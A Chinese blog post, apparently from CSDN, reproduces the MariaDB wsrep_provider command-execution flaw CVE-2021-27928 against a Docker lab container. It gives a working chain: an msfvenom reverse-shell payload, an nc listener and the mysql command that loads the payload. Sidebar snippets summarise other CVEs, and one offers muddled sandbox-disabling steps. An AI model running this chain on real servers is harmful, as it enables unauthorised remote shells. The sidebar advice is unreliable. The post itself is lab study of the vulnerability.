CVE-2021-27928漏洞复现

最新推荐文章于 2024-08-12 23:11:19 发布
最新推荐文章于 2024-08-12 23:11:19 发布
阅读量4.1k 收藏 15
点赞数 1
文章标签: CVE CVE-2021-27928 mariadb docker 漏洞复现
Wuuconix wanna a girlfriend!
本文链接:https://blog.csdn.net/Cypher_X/article/details/117073244
版权

CVE-2021-27928漏洞复现

漏洞简介:它是一个MariaDB的远程命令执行漏洞,存在于10.2.37之前的10.2版本,10.3.28之前的10.3版本,10.4.18之前的10.4版本以及10.5.9之前的10.5版本。

复现环境

  • 攻击机:Ubuntu 20.04.2 LTS
  • 目标机:mariadb/server:10.3.13 docker容器

复现准备

  • 我们需要在我们的攻击机上安装 metasploit-framework 框架。安装步骤见Nightly Installers · rapid7/metasploit-framework Wiki (github.com)

  • 安装成功后,我们利用这样一条语句生成反向Shell有效负载。

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

  • 一定要注意的是,这里的ip是攻击机自己的ip,而不是目标机的ip。port这里随便取,我取了4444。正常的运行结果如下图。

    在这里插入图片描述

  • 现在攻击机的准备工作已经做完了。我们现在需要准备目标机的环境。由于现在大多的镜像源中apt里已经不支持旧版本的mariadb,而去官网手动安装二进制文件又十分复杂。我这里选用了mariadb/server:10.3.13的docker镜像,当然你也可以选择mariadb/server:10.2.22,只要保证该版本的mariadb收到该漏洞影响即可。这里挂一下它的dockerhub网址mariadb/server (docker.com)。大家可以自行选取。

  • 最后我的Dockerfile是这样的,把攻击载荷放到了docker容器中的/tmp文件夹

    FROM mariadb/server:10.3.13 
LABEL Author="wuuconix <wuuconix@gmail.com>"
LABEL Blog="https://blog.csdn.net/Cypher_X"

COPY ./files /tmp/

    在这里插入图片描述

    那两个sh脚本是我用来快速构建和更新docker容器写的sh脚本。这样我们就不用每次输入一大串docker命令了,而只需要输入zsh build.sh,十分方便,这里放一下代码供大家参考。

    #build.sh
docker build -t maria . && \
docker run -d --name maria -e MARIADB_ROOT_PASSWORD=root  maria && \
docker exec -it maria bash  

# update.sh
docker stop maria \
&& docker rm maria \
&& docker rmi maria \
&& zsh build.sh

    从build.sh的内容我们也可以看到maria/server 镜像的使用方法,需要加一个MARIADB_ROOT_PASSWORD的环境变量,来初始root用户的密码,我这里设置的密码是root。这些都可以在dockerhub上的overview中找到。

复现过程

  • 开启容器

    在这里插入图片描述

  • 主机开启监听

    nc -lvnp  4444

  • 主机执行有效shell

    mysql -u root -p -h 172.17.0.2 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

    注意这里的172.17.0.2是目标机也就是docker容器的ip。

    在这里插入图片描述

    输入后会报错,但是不要慌,我们的监听窗口这时应该已经连上了。

    在这里插入图片描述

    输入whoami来看看当前用户。

    在这里插入图片描述

    成功。

经验总结

  • 当输入apt-cache madison mariadb-server没有想要的版本时,可以去dockerhub查找软件历史版本的镜像。

参考链接

MariaDB数据库SUPER特权漏洞CVE-2021-27928-Linux实验室 (wanyunshuju.com)

NVD - CVE-2021-27928 (nist.gov)

Wuuconix
关注
CVE-2021-27928:CVE-2021-27928 MariaDBMySQL-'wsrep provider' 命令注入漏洞
04-16
信息 Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution Date: 03/18/2021 Exploit Author: Central InfoSec Version: MariaDB 10.2 before 10.2.37 10.3 before 10.3.28 10.4 before 10.4.18 10.5 before 10.5.9 Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL Tested on: Linux CVE : CVE-2021-27928 如何利用 步骤1:建立反向Shell有效负载 msfvenom -p linux/x64/shel
uWSGI 漏洞复现
Jerry____的博客
11-29 778
uWSGI 漏洞复现CVE-2018-7490) 背景介绍 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 实训目标 1、学会根据漏洞编...
CVE-2012-2122 mysql/mariaDB身份认证漏洞
最新发布
weixin_68177269的博客
08-12 404
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,不断的尝试登录连接,回导致MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22。可见经过大数量的暴力登录之后,直接不需要密码登录到mysql。使用docker-compose 创建靶场环境。下载安装vulhub靶场环境。二、msf漏洞scan探测。不知道为什么没跑出来🥴。
漏洞修复方法:Oracle MySQL/MariaDB漏洞(CVE-2022-0778)、SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】、Harbor 代码问题漏洞(CV
weixin_54626591的博客
03-25 2132
Oracle MySQL/MariaDB漏洞(CVE-2022-0778)、SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】、Harbor 代码问题漏洞(CV
应用CVE: 最新的Mysql高危漏洞介绍
dzqxwzoe的博客
02-20 1015
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。影响5.6.38及之前的版本,5.7.19及之前的版本。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
CMS Made Simple前台代码执行漏洞 CVE-2021-26120 漏洞背景 CMS Made Simple(CMSMS)是一个免费且开源的内容管理系统(CMS),面向开发人员、程序员和网站所有者提供网页开发和管理功能。CMSMS 使用 Smarty 模板...
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625)补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞(CVE-2018-2625) 补丁包 对应的weblogic的版本是12.1.3.0 有需要的下载
CVE-2021-25281:链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
03-03
CVE-2021-25281 链接CVE-2021-25281和CVE-2021-25282以利用SaltStack
mysslstrip:CVE-2015-3152 PoC
06-06
单条 mysslstrip 是一个基于 Python 的概念验证,展示了如何根据来 MITM MySQL 流量和剥离 SSL/TLS。 用法 mysslstrip.py [-h] [-p LISTEN_PORT] [-i LISTEN_INTERFACE] dest 示例输出 [root@duo1 ~]# python2.7 mysslstrip.py -p 3307 127.0.0.1:3306 2015-04-29 21:33:14+0000 [-] Log opened. 2015-04-29 21:33:14+0000 [-] listen: 127.0.0.1:3307; connect: 127.0.0.1:3306 2015-04-29 21:33:14+0000 [-] MySQLForwardServerFactory starting on 3307 2015-04
mysql cve-2015-3152_麻烦的安全漏洞解决方案
weixin_29304985的博客
01-27 484
1.Hadoop 未授权访问【原理扫描】 2/4 50% 2解决方案:配置防火墙,不允许集群外机器访问50070端口2.Oracle MySQL SSL证书验证安全限制绕过漏洞(CVE-2015-3152) 2/4 50% 2解决方案:配置防火墙,不允许集群外机器访问3.ZooKeeper 未授权访问【原理扫描】 3/4 75% 3解决方案:配置防火墙,不允许集群外机器访问2181端口4.SSL ...
vulhub靶场mysql类型CVE-2012-2122漏洞复现
qq_58873970的博客
07-24 645
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
MySQL SSL/TLS连接存在安全漏洞 可遭中间人攻击
weixin_33712987的博客
09-01 399
由于客户端在连接MySQL时SSL选项使用不当,将可能引起中间人攻击。该漏洞将导致数据库通信数据以明文形式在网络上传输。 漏洞详情 这个漏洞与客户端的”–ssl”选项有着很大关系,这个选项在受影响的版本中处于”建议使用”的级别。因此,当客户端尝试和服务器端进行初始化SSL/TLS连接时,将不会要求使用这一选项。这就帮助MITM攻击者轻易地去除了SSL/...
mysql 验证漏洞_MySQL/MariaDB用户验证绕过漏洞
weixin_28829325的博客
01-27 1074
发布日期:2012-06-10更新日期:2012-06-11受影响系统:MySQL AB MySQL < 5.6.6MySQL AB MySQL < 5.5.24MySQL AB MySQL < 5.1.63MariaDB MariaDB < 5.5.23MariaDB MariaDB < 5.3.6MariaDB MariaDB < 5.2.12MariaDB...
cve-2021-3618漏洞复现
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值